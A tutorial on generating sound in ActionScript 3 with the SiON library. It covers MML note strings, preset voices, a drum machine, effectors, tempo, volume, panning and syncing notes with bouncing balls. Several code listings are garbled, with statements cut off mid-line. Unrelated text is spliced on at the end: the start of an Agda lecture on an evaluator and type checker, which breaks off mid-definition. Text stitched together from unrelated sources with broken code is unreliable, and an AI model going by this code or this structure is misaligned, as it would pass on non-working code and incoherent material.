With SiON you can generate dynamic sounds on the run without the need of loading any audio files. Also makes it very easy to synchronize sounds with display objects (eg. object hitting a wall, explosion etc).
From the multitude of features it has I'll show you the essentials of working with it: using MML (Music Macro Language) data to generate sound, using voice presets and effectors on playing sounds, setting the tempo (BPM), panning and changing volume and lastly I'll show you how to sync sounds with display objects.
Step 2: Setting up the Project
Let's start by creating a new project. Open your code editor and create a new ActionScript 3 project.
I've named my project SiON Tutorial. After this open the document class (in my case
Main).
You should have something similar to this:
package { import flash.display.Sprite; [SWF(width = 550, height = 300, backgroundColor = 0x1f1f1f, frameRate = 30)] public class Main extends Sprite { public function Main():void { } } }
In FlashDevelop you would probably have an
init() method called when the movie is added to stage. Go ahead and modify the code so that it matches the one above.
Leave this file opened and onto the next step.
Step 3: Basic Usage
To start using SiON and hearing sound we only need to create one object:
SiONDriver. This class provides the driver of SiON's digital signal processor emulator and through this class all basic operations are provided as properties (
bpm,
volume), methods (
pause(),
play(),
stop(),
fadeIn() and events (bmp changes, stream start and stop).
Note: Only one instance of the SiON driver class can be created at any given moment. Trying to create multiple instances will make the compiler throw an error. To get the existing instance of the
SiONDrive class you can use the
SiONDriver.mutex static property.
In your document (Main) class add a new private variable called
_driver and instantiate it in the constructor.
package { import flash.display.Sprite; import org.si.sion.SiONDriver; [SWF(width = 550, height = 300, backgroundColor = 0x1f1f1f, frameRate = 30)] public class Main extends Sprite { private var _driver:SiONDriver; public function Main():void { _driver = new SiONDriver(); } } }
In order to play a sound you need to call upon the
play() method of the
SiONDriver object and pass as an argument an
SiONData object or a MML string. For our example we'll use an MML string (as the
SiONData object is actually a compiled MML string in its essence).
_driver.play('l8 cdefgab<c');
Add this line of code in the class and run the project (Ctrl+Enter if using FlashDevelop). You should now hear the notes (eight notes) from C5(or Do in octave five) to C6(or Do in octave six). But what does
l8 cdefgab<c actually mean?
Step 4: Music Macro Language
Music Macro Language (or MML) is a music description language used for sequencing music. The following elements are basically in each MML implementation (including SiON):
Note: Letters from a to g correspond to musical pitches and play the corresponding note. So c, d, e, f, g, a, b would have the following equivalent on a stave:
To set the length of a note you simply append a whole number to it. Let's say you want a full c you would write c1. If you want c eight note you will write c8 (which is 8 times shorter than c1) and so on. If you don't append any number to a note, it uses the default length of 4 (a quarter).
Rest: This defines the pause between two notes. The macro for rest is r. When followed by a whole number it represents the length of the rest (example: r4 would mean a quarter rest).
Length: To specify the default length of more notes you can use l with a whole number in front of it which represents the length.
Example:
l1 cdf l16 cdf
Octave: The default octave of a note (which defines the note's pitch) is the fifth octave. You can change the octave in two ways:
- Using the o macro (followed by an integer from 0-9) in front of the note. For example
o7cwould play the C note in the seventh octave.
- Using the octave increment > or decrement < macro in front of a note. For example if you want to play the C note in the fourth octave you would write:
<c(remember that the default octave is the fifth one).
Sharp and flat notes: In order to play a sharp note you append a + or # to the note (e.g.
b+ or
b#, both having the same result) and to play a flat note you append a - (e.g.
a-).
Loops: To play a loop you need to wrap the macro around square brackets (e.g.
[cdb]3 would translate into
cdb cdb cdb). To specify how many times a loop should play you append an integer to the text. If no number is specified the loop will play two times.
That's the basic usage of MML. To read more on the subject you can visit the wiki page here. Also visit the MML reference manual for SiON for a complete documentation on MML for SiON.
Note: For a large database of MML songs examples you can visit the MMLTalks application. Click on a song title from the list to play it. To see the MML source of a song click the rightmost button.
Step 5: SiONData
So I've said that a
SiONData object is actually a MML string compiled. To compile an MML string into an
SiONData object you can use the
compile() method of the
SiONDriver class.
package { import flash.display.Sprite; import org.si.sion.SiONData; import org.si.sion.SiONDriver; [SWF(width = 550, height = 300, backgroundColor = 0x1f1f1f, frameRate = 30)] public class Main extends Sprite { private var _driver:SiONDriver; private var _data:SiONData; public function Main():void { _driver = new SiONDriver(); _data = _driver.compile('l8 cdefgab<c'); _driver.play(_data); } } }
As you can see first we use the drivers
compile() method to compile the MML string into a
SiONData object after which we call upon the
play() method and pass the
_data object as an argument. As you can see this has the same result as before when a string was used.
Step 6: Playing Multiple Sounds
So everything looks fine when playing one sound at a time but what about playing multiple sounds? Modify the class to look like the code below and let's see what happens.
package { import com.bit101.components.PushButton; import flash.display.Sprite; import flash.events.Event; import org.si.sion.SiONData; import org.si.sion.SiONDriver; [SWF(width = 550, height = 300, backgroundColor = 0x1f1f1f, frameRate = 30)] public class Main extends Sprite { private var _driver:SiONDriver; private var _s1:SiONData, _s2:SiONData; public function Main():void { _driver = new SiONDriver(); _s1 = _driver.compile('l8 cdefgab<c'); _s2 = _driver.compile('l8 o6c o5bagfedc'); addSoundButtons(); } private function addSoundButtons():void { var b1:PushButton = new PushButton(this, 10, 10, "Play sound 1", onPlaySound); var b2:PushButton = new PushButton(this, b1.x + b1.width + 5, 10, "Play sound 2", onPlaySound); function onPlaySound(e:Event):void { if (e.target == b1) _driver.play(_s1); if (e.target == b2) _driver.play(_s2); } } } }
Run the code and click on one of the two buttons that appear (Play sound 1 or Play sound 2). The first button plays the notes C5 to C6 and the second button plays the reverse of the first sound. If you click one and click the other before the sound finishes the first played sound will be stopped and the second one will be played.
If you want to play both sounds independently you need to use the
sequenceOn() method of the
SiONDriver class.
Note: Some methods (like
sequenceOn()) will work only after the
play() method of the
SiONDriver object has been called. If you try to call these methods before that, the compiler will throw an error.
To enable our code to play both sounds at the same time first call the
play() method in the constructor just before the
addSoundButtons() method.
_driver.play(); addSoundButtons();
Now that the driver is active we can safely modify the
onPlaySound() function like so:
function onPlaySound(e:Event):void { if (e.target == b1) _driver.sequenceOn(_s1); if (e.target == b2) _driver.sequenceOn(_s2); }
If you run the code now and push both buttons you will be able to hear the two sounds playing at the same time. In a real case scenario you would use more complex sounds, of course, but these are just fine to understand how it works.
Step 7: Stopping Sequences
The example above works just fine but there's one glitch. If you push a button repeatedly the same sound will start playing multiple times. This might work for you but what if you want to play it only once? In a real case scenario you might be in the need of stopping a sound before it's finished.
For this you can use the
sequenceOff() method of the driver class. This method requires a track id representing the track that you want to stop playing and so we'll need to set that track id when a sound is played using
sequenceOn().
Make the changes in the highlighted lines from the
onPlaySound() function:
function onPlaySound(e:Event):void { if (e.target == b1) { _driver.sequenceOff(1); _driver.sequenceOn(_s1, null, 0, 0, 1, 1 ); } if (e.target == b2) { _driver.sequenceOff(2); _driver.sequenceOn(_s2, null, 0, 0, 1, 2 ); } }
As you might have already noticed we set a track id for each sequence (the sixth parameter) so that we can reference it later by using the
sequenceOff() method to stop it.
Step 8: Voices
Think of "voices" as being different instruments. As you have noticed the default sounds played in SiON are a bit annoying and you may want to hear sound from a piano.
Lucky for us the SiON library comes with some preset voices (462 voices in the current version to be precise).
All these voice presets are contained in the
SiONPresetVoice class and are sorted in 15 categories.
Accessing these voices or categories is very simple. First you need an instance of the
SiONPresetVoice class and then access them either by voice key (in case of voices) or by voice number and category key (in case of categories) or by category number.
The following example demonstrates how to access a voice or category in different ways.
var presets:SiONPresetVoice = new SiONPresetVoice(); // Instance of the SiONPresetVoices // Accessing voice by key var voiceByKey:SiONVoice = presets["valsound.brass2"]; // Returns the valsound.brass2 voice from the valsound.brass category // Accessing category by key var categoryByKey:Array = presets["valsound.wind"]; // Returns the valsound.wind category // Accessing voice by number var voiceByNo:SiONVoice = categoryByKey[3]; // Returns the 4th voice (valsound.wind4) in the valsound.wind category // Accessing category by number var categoryByNo:Array = presets.categolies[3]; // Returns the valsound.brass category
(Yes,
categolies with an L; that's not a typo.)
Step 9: Voice Selector
Now we're going to create a new class which will help us to view categories and voices in each category.
First create a new class in your project named
VoiceSelector that extends the
Sprite class.
package { import com.bit101.components.ComboBox; import flash.display.Sprite;"); _voices = new ComboBox(this, _categories.width + _categories.x + 5, 0, "Select a voice"); } } }
In here we need a reference to a
SiONPresetVoice object so we add a new variable called
_presets and instantiate in the constructor.
Also we need two combo boxes: one for the categories and one for the voices. We'll use the
ComboBox component from the minimalcomps library.
Step 10: VoiceSelector Categories and Voices
Now that we have our UI placed, we first need to populate the categories list. For this we'll write a method called
populateCategories(), so go ahead and add it to the class.
private function populateCategories():void { for each (var cat:Array in _presets.categolies) _categories.addItem(cat.name); }
Also it's necessary to call this method from the constructor of the class, so add it on the last line of the constructor. We also need an event listener to modify the voices list when a category is selected.
package { import com.bit101.components.ComboBox; import flash.display.Sprite; import flash.events.Event;"); _categories.width = 120; _voices = new ComboBox(this, _categories.width + _categories.x + 5, 0, "Select a voice"); _voices.width = 120; populateCategories(); _categories.addEventListener(Event.SELECT, populateVoices); } private function populateCategories():void { for each (var cat:Array in _presets.categolies) _categories.addItem(cat.name); } private function populateVoices(e:Event = null):void { _voices.removeAll(); _voices.selectedIndex = 0; var voices:Array = _presets[_categories.selectedItem]; for (var i:int = 0; i < voices.length; i++) _voices.addItem(voices[i].name); } } }
As you can see in the
populateCategories() method we use a for-each loop to get each category available.
In the
populateVoices() method we need first to remove all items from the voices list, get the array corresponding to the selected category and add the items to the voices list.
Last thing we need to do to complete our voice selector is add a getter to return the selected voice.
public function get voice():SiONVoice { if(_categories.selectedItem) return _presets[_categories.selectedItem][_voices.selectedIndex]; else return null; }
Step 11: Using the Selector
OK. So we have the voice selector ready. Go back to the main class and add a new private property called
_selector of type
VoiceSelector.
private var _selector:VoiceSelector;
Now we are going to add a method to create the selector called
addSelector() in which we instantiate the
VoiceSelector object and add it to the stage.
private function addSelector():void { _selector = new VoiceSelector(); _selector.x = 220; _selector.y = 10; addChild(_selector); }
Also call this method from within the constructor just after the
addSoundButtons() method call.
public function Main():void { _driver = new SiONDriver(); _s1 = _driver.compile('l8 cdefgab<c'); _s2 = _driver.compile('l8 o6co5bagfedc'); _driver.play(); addSoundButtons(); addSelector(); }
Step 12: Playing Sounds with Selected Voice
At step 6 we played some notes using the default voice. Now we want to play the same notes but using the selected voice in the voice selector.
To do this simply modify the
onPlaySound() function like so:
function onPlaySound(e:Event):void { if (e.target == b1) { _driver.sequenceOff(1); _driver.sequenceOn(_s1, _selector.voice, 0, 0, 1, 1 ); } if (e.target == b2) { _driver.sequenceOff(2); _driver.sequenceOn(_s2, _selector.voice, 0, 0, 1, 2 ); } }
When playing a sequence the second parameter of the
sequenceOn method represents the voice used for the sound data.
Run the code and play around with different voices to see how each sounds (click the Play sound 1 or Play sound 2 button to play one of the two sounds).
Step 13: Sound Objects
Another way to get more control over playing sounds in SiON is using the
SoundObjects. The
SoundObject class is the base class for all objects that can play sounds by operating
SiONDriver.
You can define your own sound object by extending the
SoundObject class and implementing everything you need. The SiON library has some built in classes that extend the
SoundObject to implement different features. Some of these are
MMLPlayer (used to play an MML string with control over the played tracks),
PatternSequencer (which provides simple one track pattern player) and
MultiTrackSoundObject (this being the base class for
SoundObjects that use multiple tracks).
To keep it simple we won't create a custom sound object but we'll use one already existing in SiON. There is an interesting class
DrumMachine that provides independent bass drum, snare drum and hi-hat cymbals tracks. It is not a direct descendant of the
SoundObject class but I find it better suited for this tutorial.
Step 14: DrumMachine
As I've said before the
DrumMachine class is a
MultiTrackSoundObject which in its turn is a descendant of the
SoundObject class.
Drum machine provides three main tracks: bass, hi-hat and snare. All these tracks can be independently controlled meaning that you can change properties like volume, voices or patterns on each without affecting the others.
First let's add two new variables to our
Main class:
private var _drumsToggler:PushButton; private var _drums:DrumMachine;
The first one provides a button used to start/stop the drums and the second one represents the drum machine used by us.
Now add the
addDrums() method which is used to create
DrumMachine object and the button that toggles it on and off.
private function addDrums():void { _drums = new DrumMachine(); _drumsToggler = new PushButton(this, 10, 35, "Drums OFF", toggleDrums); _drumsToggler.toggle = true; }
Also we need to add the handler to the button:
private function toggleDrums(e:Event):void { _drumsToggler.label = _drumsToggler.selected ? "Drums ON" : "Drums OFF"; if (_drumsToggler.selected) _drums.play(); else _drums.stop(); }
And last but not least call the
addDrums()(); }
If you run the code now you should see a new button. If you click it you will hear the
DrumMachine playing. Neat, isn't it?
Step 15: Independent Volume
Like I've said before each track in a
MultiTrackSoundObject (like
DrumMachine) can be controlled independently from each other. To demonstrate this we'll change the volume on each track of the
DrumMachine object created earlier.
Let's start by adding some knobs for the volume, using the minimalcomps
Knob class. For this we're going to create a new class called
DrumsVolume.
package { import com.bit101.components.Knob; import flash.display.Sprite; import flash.events.Event; public class DrumsVolume extends Sprite { private var _bassKnob:Knob; private var _snareKnob:Knob; private var _hihatKnob:Knob; public function DrumsVolume() { addBassKnob(); addSnareKnob(); addHiHatKnob(); } private function addBassKnob():void { _bassKnob = new Knob(this, 15, 0, "Bass vol.", onChange); _bassKnob.radius = 10; _bassKnob.labelPrecision = 0; _bassKnob.value = 100; } private function addSnareKnob():void { _snareKnob = new Knob(this, 15, _bassKnob.y + _bassKnob.height + 5, "Snare vol.", onChange); _snareKnob.radius = 10; _snareKnob.labelPrecision = 0; _snareKnob.value = 100; } private function addHiHatKnob():void { _hihatKnob = new Knob(this, 15, _snareKnob.y + _snareKnob.height + 5, "Hi-Hat vol.", onChange); _hihatKnob.radius = 10; _hihatKnob.labelPrecision = 0; _hihatKnob.value = 100; } public function get bassVol():Number { return _bassKnob.value/100; } public function get snareVol():Number { return _snareKnob.value/100; } public function get hihatVol():Number { return _hihatKnob.value/100; } private function onChange(e:Event):void { dispatchEvent(new Event(Event.CHANGE)); } } }
In this class we simply create three different knobs (one for each track) and dispatch a
CHANGE event when a knob is turned. Also there are three getters to retrieve the value of each volume knob.
Step 16: Setting the Volume
Now back in the
Main class add a new variable called
_drumsVolume and add the
addDrumsVolume() method:
private function addDrumsVolume():void { _drumsVolume = new DrumsVolume(); _drumsVolume.addEventListener(Event.CHANGE, onVolumeChange); _drumsVolume.x = 5; _drumsVolume.y = _drumsToggler.y + _drumsToggler.height + 5; addChild(_drumsVolume); }
Also as you can see we add a listener to the
DrumsVolume object for
CHANGE events so we need to add the handler also.
private function onVolumeChange(e:Event):void { _drums.bassVolume = _drumsVolume.bassVol; _drums.snareVolume = _drumsVolume.snareVol; _drums.hihatVolume = _drumsVolume.hihatVol; }
And finally add the highlighted line in the constructor of the
Main class.
public function Main():void { _driver = new SiONDriver(); _s1 = _driver.compile('l8 cdefgab<c'); _s2 = _driver.compile('l8 o6co5bagfedc'); _driver.play(); addSoundButtons(); addSelector(); addDrums(); addDrumsVolume(); }
Run the project and play with the knobs. Be sure you turn on the
DrumMachine to see how each track's volume is changed.
Step 17: Effectors
SoundObjects are useful for yet another purpose. You can add effectors to them in order to obtain different sound effects.
This way you can obtain effects like reverb, distortion, stereo chorus, auto pan, delay and many others.
You can find a complete list of built in effectors in the
org.si.sion.effector package. Of course you can also make your own custom effectors by extending the
SiEffectBase class.
To add one effector (or more) you can simply set them using the
effectors property of the
SoundObjects instance.
In our case if we wanted to use a distortion effect and an auto pan effect on the drums, we would do so like this:
_drums.effectors = [new SiEffectDistortion(), new SiEffectAutoPan()];
To remove all effectors from the
SoundObject simply pass in an empty array.
_drums.effectors = [];
Step 18: Playback Speed
There might be a case where you need to dynamically specify the playback speed of all sound played within SiON (e.g. in a game where you enter in slow motion mode).
To specify the playback speed you need to modify a property called bpm (which stands for beats per minute). This is a property of the
SiONDriver class and can be used as a global modifier for all sounds played within SiON.
Let's add a knob to modify this property.
First define a new private variable in the
Main class named
_bpmKnob.
private var _bpmKnob:Knob;
Next we'll create a method to add the knob and attach an event handler to it.
private function addBPMKnob():void { _bpmKnob = new Knob(this, 70, _drumsVolume.y + 10, "BPM", changeMaster); _bpmKnob.minimum = 48; _bpmKnob.maximum = 256; _bpmKnob.labelPrecision = 0; _bpmKnob.value = _driver.bpm; } private function changeMaster(e:Event):void { if(e.target == _bpmKnob) _driver.bpm = _bpmKnob.value; }
As you can see in the event handler we simply check if the bpm knob has been turned and set the master bpm accordingly.
Run the code and give it a try. Turn on the drum machine or play one of the two sounds to see how the bpm affects the playback.
Note: Don't forget to call the
addBPMKnob()(); }
Step 19: Master Volume
As done with the bpm you can change the volume of all sounds playing in SiON using the driver's
volume property.
We're going to add another knob to serve as a master volume modifier.
private var _volumeKnob:Knob;
The
addVolumeKnob() method will instantiate the volume knob and configure it.
private function addVolumeKnob():void { _volumeKnob = new Knob(this, 70, _bpmKnob.y + _bpmKnob.height + 10, "Volume", changeMaster); _volumeKnob.labelPrecision = 0; _volumeKnob.value = _driver.volume * 100; }
As seen above the volume knob uses the same
changeMaster() event handler to change the volume so we need to add one more line in the handler:
private function changeMaster(e:Event):void { if (e.target == _bpmKnob) _driver.bpm = _bpmKnob.value; if (e.target == _volumeKnob) _driver.volume = _volumeKnob.value / 100; }
Note: The value of the volume knob is divided by 100 because the
volume property of the
SiONDriver class takes a value from 0 to 1.
Also add the following code as the last line in the constructor:
addVolumeKnob();
Step 20: Panning
Currently SiON supports only one channel or two channel output. If you're using two channel output (like headphones or dual speakers -- the default when instantiating the
SiONDriver) you can pan the sound so that you hear them in one channel or the other or more in one than the other.
The
SiONDriver class has a property called
pan which can be used to pan all sound coming out of SiON. Let's add a pan control to our project.
First we'll use a horizontal slider to represent the pan controller.
private var _panController:HUISlider;
Then we'll make use of the
addPanControl() method to create and add the slider to the stage.
private function addPanControl():void { _panController = new HUISlider(this, _selector.x, _selector.y + _selector.height + 10 , "Pan", panSound); _panController.minimum = -100; _panController.maximum = 100; _panController.labelPrecision = 0; }
As you can see the handler for the slider is
panSound() so let's add this one too.
private function panSound(e:Event):void { _driver.pan = _panController.value / 100; }
In the handler we simply set the driver's
pan property to the value of the slider divided by 100. The division is necessary because the
pan property can only take values from -1 to 1.
Add the
addPanControl() method call in the last line of the constructor, compile the code and give it a try.
Note: To better observe the difference you can use some headphones.
Step 21: Synchronizing
As I've said at the beginning of the tutorial SiON makes it very easy to sync sounds with display data.
The simplest way to sync sounds with display objects is by using the
noteOn() method of the
SiONDriver class.
So let's say you have a ball that bounces and an event is fired when that ball hits the floor/roof/walls. You can add an event listener for that event and in the event handler you would do something like this:
private function onBallHit(e:Event):void { _driver.noteOn(50, _presets["valsound.percus3"], 1); }
This would play a percussion note when the ball hits something.
Of course for the example above we've considered the
_driver as the
SiONDriver instance and
_presets being an instance of the
SiONPresetVoice class.
Note: As any other operation in SiON you need the driver to be streaming in order for it to work (
_drive.play() must be called before).
Step 22: Integrating the Example
Now that you have an idea how easy it is to sync sounds with display data let's integrate the above example in our project.
We'll start by adding a new class called
Ball which will represent the moving object.
package { import flash.display.Sprite; public class Ball extends Sprite { public var vx:Number; public var vy:Number; public function Ball() { draw(); } private function draw():void { graphics.clear(); graphics.beginFill(0xffffff, 0.9); graphics.drawCircle(5, 5, 5); graphics.endFill(); } } }
In this class we simply draw a white circle with a diameter of
10px which has two public properties
vx and
vy that represent the velocities on each axis.
Step 23: Ball Container
Now that we have an object to move we'll create a container in order to specify some boundaries. When the ball hits these boundaries some short sound will be played. A rectangle shape will do just fine as a container.
Add a new class to the project called
BallContainer
package { import flash.display.Sprite; import org.si.sion.SiONDriver; import org.si.sion.utils.SiONPresetVoice; public class BallContainer extends Sprite { private var _balls:Array; private var _voices:SiONPresetVoice; private var _driver:SiONDriver; public function BallContainer() { _voices = new SiONPresetVoice(); _driver = SiONDriver.mutex ? SiONDriver.mutex : new SiONDriver(); _driver.play(); draw(); } private function draw():void { graphics.beginFill(0, .3); graphics.lineStyle(1, 0, 0.6); graphics.drawRect(0, 0, 320, 170); graphics.endFill(); } } }
In this class we have an array called
_balls (this will hold the instances of the created balls), an instance of the
SiONDriver named
_driver and an instance of the
SiONPresetVoice meaning the
_voices variable.
In the constructor we simply instantiate the voice presets after which we get the driver instance if it already exists (remember the note from Step 3 about how we can only create one instance of the SiON driver class at any given moment) or create a new one. Also we start the driver with the
play() method.
The
draw() method simply draws the containers background and the walls.
Adding balls to the container
Now that the container is drawn we need to add some balls to it. The
addBalls() method does just that so go ahead and add it to the
BallContainer class.
private function addBalls():void { _balls = []; for (var i:int = 0; i < 5; i++) { var b:Ball = new Ball(); addChild(b); _balls.push(b); b.x = Math.random() * 310; b.y = Math.random() * 160; } }
In this method a
for-loop is used to create five balls and add them in the container at a random position.
Also add the following code just after the last line in the constructor:
addBalls();
Moving them
OK. Everything's fine so far. A last thing we need to add to our class to make it functional is an event listener for
ENTER_FRAME events where we move the balls.
First add the event listener in the constructor:
public function BallContainer() { _voices = new SiONPresetVoice(); _driver = SiONDriver.mutex ? SiONDriver.mutex : new SiONDriver(); _driver.play(); draw(); addBalls(); addEventListener(Event.ENTER_FRAME, onEnterFrame); }
Then add the handler for this listener:); } }
In the
onEnterFrame() handler we us a for-loop to go through every ball and update its position. Also we check whether a ball has hit a boundary using an if-statement and if it has we use the
noteOn() method to play a sound.
In the
noteOn() method we've used the following parameters:
note- this represents the note to be played and is an integer from 0 to 127 (or C0 to B9). As you can see we get the appropriate note depending on the ball number (just to mix the notes and not have same sound).
voice- this is the voice in which the note will be played. In our case a Xylophone is used (or midi.chrom6 voice).
length- this parameter represents the note length in 16th beat. If this is set to 0 the note will not be removed and will remain in memory (if you use a length of 0 you should use the
noteOff()method in order to remove it).
Adding the container
Now that everything is set up let's make use of this container. Open the
Main class and add a new private variable named
_ballCont of type
BallContainer.
We'll make use of another method (conveniently named
addBallContainer()) to add the container to the stage.
private function addBallContainer():void { _ballCont = new BallContainer(); addChild(_ballCont); _ballCont.x = 170; _ballCont.y = 80; }
And also call this method from(); addVolumeKnob(); addPanControl(); addBallContainer(); }
Run the code and see how it works. When a ball hits a wall and changes direction a note should be played.
Step 24: Final Touch
Now just as a final touch to we'll add some functionality to the ball container so that we can start and stop it.
package { import flash.display.Sprite; import flash.events.Event; import flash.events.MouseEvent; import org.si.sion.SiONDriver; import org.si.sion.utils.Scale; import org.si.sion.utils.SiONPresetVoice; public class BallContainer extends Sprite { private var _balls:Array; private var _on:Boolean; private var _voices:SiONPresetVoice; private var _driver:SiONDriver; public function BallContainer() { _voices = new SiONPresetVoice(); _driver = SiONDriver.mutex ? SiONDriver.mutex : new SiONDriver(); _driver.play(); draw(); addBalls(); addEventListener(MouseEvent.CLICK, onClick); } private function onClick(e:MouseEvent):void { if (_on) stop(); else start(); }); } } private function draw():void { graphics.beginFill(0, .3); graphics.lineStyle(1, 0, 0.6); graphics.drawRect(0, 0, 320, 170); graphics.endFill(); } private function addBalls():void { _balls = []; for (var i:int = 0; i < 5; i++) { var b:Ball = new Ball(); addChild(b); _balls.push(b); b.x = Math.random() * 310; b.y = Math.random() * 160; } } public function start():void { var b:Ball; for (var i:int = 0; i < _balls.length; i++) { b = _balls[i]; b.vx = (Math.random() * 10) - 5; b.vy = (Math.random() * 10) - 5; } _on = true; addEventListener(Event.ENTER_FRAME, onEnterFrame); } public function stop():void { _on = false; removeEventListener(Event.ENTER_FRAME, onEnterFrame); } } }
As you can see I've highlighted the additions in the
BallContainer class.
As a brief explanation I've first added a boolean variable
_on which keeps track if the movie is playing (balls are moving) or not. In the constructor I've changed the line that adds an event listener for
ENTER_FRAME event with one for
MOUSE_CLICK events. Also the
MouseEvent handler named
onClick() is used to start or stop the movie when it's clicked.
Lastly in the
start() and
stop() methods the
ENTER_FRAME event listener is added and respectively removed. Also in the
start() method we reset the velocities on each ball.
Conclusion
The SiON library is very useful when you need to use a lot of sound (in games most often) but you can't afford the extra size of the SWF or time to load them. As you can see it's not that hard at all to create interesting sounds on the run.
You can see many examples of cool implementations of the library at wonderfl.net. Also these examples are useful to learn more about other features in SiON.
I hope you enjoyed this tutorial and thank you for reading<< | https://code.tutsplus.com/tutorials/generating-digital-audio-using-sion--active-8650 | CC-MAIN-2021-21 | refinedweb | 5,562 | 66.23 |
Introduction to Python wait()
Python wait() method is defined as a method for making the running process to wait for the other process like child process to complete the execution and then resume the process of the parent class or event. This wait()method in Python is a method of os module which generally makes the parent process to synchronize with its child process which means the parent will wait for the child process to complete its execution (i.e wait until the exit of the child process) and later continue with its process execution. This method is also defined as a method of event class in the Python threading module to suspend the execution of the event where its internal flag is set to false which will suspend the current block or event for executing until the internal flag is set to true.
Working of wait() Method in Python
In this article, we will discuss the wait() method which is obtained in the os module in the Python programming language and is declared or defined as os.wait(). This os.wait() function is used for suspending or stopping the parent process until the child process is executed. This wait() function is usually used for waiting whenever the process needs something to happen where it will wait until the function returns true with some specified or declared conditions or modes.
In Python, the wait() function is defined in two different modules such as the os module and threading module. In the threading module the event class provides this wait()method for holding the current thread execution for the event to be executed or completed. Whereas the os module also has the same working but in the os module it works with the parent process to wait until the child completes its execution. In the below section let us both these methods in detail with examples. In Python, the os.wait() function has syntax as follows:
Syntax:
os.wait()
This syntax returns the child process’s id in the form of a tuple along with a 16-bit integer which is also present in the tuple to denote the exit status. This method which returns a 16-bit integer which in turn includes higher and lower byte where lower byte has the signal number as zero which will kill the process and the higher byte will have the exit status notification. This os.wait() function does not take any parameters or arguments. Now let us see a simple example for this method as follows:
Example #1
Code:
import os
print(" Program to demonstrate wait() method:")
print("\n")
print("Creating child process:")
pr = os.fork()
if pr is 0:
print("Child process will print the numbers from the range 0 to 5")
for i in range(0, 5):
print("Child process printing the number %d"%(i))
print("Child process with number %d existing" %os.getpid())
print("The child process is",(os.getpid()))
else:
print("The parent process is now waiting")
cpe = os.wait()
print("Child process with number %d exited" % (cpe[0]))
print("Parent process with number %d exiting after child has executed its process" % (os.getpid()))
print("The parent process is", (os.getpid()))
Output:
In the above program, we can see to demonstrate the wait() method of os module in Python. Firstly, the import os module. So when we want the wait() method for the parent process until the child process completes its execution. So to invoke or create a child process we have to call the fork() method. Then to get parent id we have to call the getpid() method. So in the above program, it will print the child process number ranging from 0 to 4 and until it prints the child process the parent process will be waiting. Therefore the child process id that has completed the execution of the process will be exited and then the parent process will exit.
Now we will see another module in Python that uses the wait() method that is a threading module which mainly includes mechanisms which allow synchronization of threads, so to release the locks and then lock another block until the thread is executed we use this wait() method and it also again requires the lock and returns with the specified timeout. This method is mainly found in the event class of the threading module in Python. So the syntax can be written as below:
Firstly we need to import the threading module and event class and that can be done as follows;
from threading import Event
wait( timeout= None)
wait() method will take an argument timeout which is optional and is used for specifying the particular time for waiting and after the time is out the events or threads get unblocked. This method returns the Boolean value where it returns true if the thread is released before the timeout or else it will return a false value.
So let us see a sample example of how the wait() method works in the threading module.
Example #2
import threading
import time
defhf(et_obj, timeout,n):
print("Thread started, for the event to set")
print("\n")
flag = et_obj.wait(timeout)
if flag:
print("The Event earlier was true, now moving forward")
else:
print("Time has run out , yet the event internal flag is still false.")
print("Start executing thread without waiting for event to become false")
print(n)
print("\n")
if __name__ == '__main__':
print("Start invoking the event")
et_obj = threading.Event()
t1 = threading.Thread(target=hf, args=(et_obj,5,17))
t1.start()
time.sleep(5)
print("It will start generating the event")
print("\n")
et_obj.set()
print("So the Event is now set to true.")
print("Now threads can be released.")
print()
Output:
In the above program, we are demonstrating the wait() method with a timeout parameter where we are importing the thread module. First, the event will start by setting it to true and then the timeout will start and once the timeout occurs then automatically flag will be set to false where it will start executing the thread without waiting for the event to complete as the time is run out and if we want to the thread to wait until the event completes then we are using sleep() method where we are making the thread to sleep for 5 seconds and then resume and once the event is completed it will set to true where the threads can be released for further execution.
Conclusion
In this article, the python provides a module known as os (operating system) where it provides the wait() function for the parent process to wait until its child gets executed completely. In this article, we saw how the wait() function can be used for the parent process to wait with an example. In this article, we also there is another module threading which also provides a wait() function for the thread to wait until the events get executed with example.
Recommended Articles
This is a guide to Python wait(). Here we also discuss the introduction and working of wait() method in python with examples along with different examples and its code implementation. You may also have a look at the following articles to learn more – | https://www.educba.com/python-wait/ | CC-MAIN-2021-49 | refinedweb | 1,202 | 65.15 |
{- Computer Aided Formal Reasoning (G53CFR, G54CFR) Thorsten Altenkirch Lecture 13: Evaluator and type checker In this lecture we investigate an evaluator for a simple language of expressions over natural numbers and booleans. We first implement an untyped evaluator (which may fail and is slow) and then an evaluator for a typed language which will always succeed and is faster. To go from an untyped expression to a typed expression we implement a type checker. The type checker may also fail but this is early (before evaluation) and doesn't affect the efficiency of evaluations. -} module l13 where open import Data.Nat open import Data.Bool open import Data.Maybe open import Data.Product open import Relation.Nullary open import Relation.Binary.PropositionalEquality {- an untyped language of expressions -} infix 3 _≤E_ infix 4 _+E_ data Expr : Set where nat : ℕ → Expr bool : Bool → Expr _+E_ : Expr → Expr → Expr _≤E_ : Expr → Expr → Expr ifE_then_else_ : Expr → Expr → Expr → Expr {- Examples of expressions: -} e1 : Expr -- if 3 ≤ 4 then 4 + 1 else 0 e1 = ifE (nat 3) ≤E (nat 4) then (nat 4) +E (nat 1) else (nat 0) e2 : Expr -- 3 ≤ 4 + 5 e2 = (nat 3) ≤E (nat 4) +E (nat 5) e3 : Expr -- (3 ≤ 4) + 5 e3 = ((nat 3) ≤E (nat 4)) +E (nat 5) {- The result of evaluating an expression is a value -} data Val : Set where nat : ℕ → Val bool : Bool → Val {- To accomodate errors we introduce the Maybe monad. A Monad M is an operation on Sets such that M A is the type of computations over A. In the case of Maybe a computation is something that may go wrong (i.e. returns nothing). Each monad comes with two functions: return : {A : Set} → A → M A turns a value into a (trivial) computation. _>>=_ : {A B : Set} → M A → (A → M B) → M B (bind) m >>= f runs first the computation m and if it returns a value runs f in it. The effects are a combination of running both computations. -} -- for Maybe return is just (no error) return : {A : Set} → A → Maybe A return a = just a infix 2 _>>=_ -- bind does error propagation _>>=_ : {A B : Set} → Maybe A → (A → Maybe B) → Maybe B just a >>= f = f a nothing >>= f = nothing {- To implement the evaluator we implement some convenience functions. -} {- Addition of two values has to check wether the values are indeed numbers -} _+v_ : Val → Val → Maybe Val nat m +v nat n = return (nat (m + n)) _ +v _ = nothing {- dec2bool coerces decidability into bool by forgetting the evidence. -} dec2bool : {A : Set} → Dec A → Bool dec2bool (yes p) = true dec2bool (no ¬p) = false {- This is used to implement ≤ for values. As +v this has to check wether the arguments are numbers. -} _≤v_ : Val → Val → Maybe Val nat m ≤v nat n = return (bool (dec2bool (m ≤? n))) _ ≤v _ = nothing {- 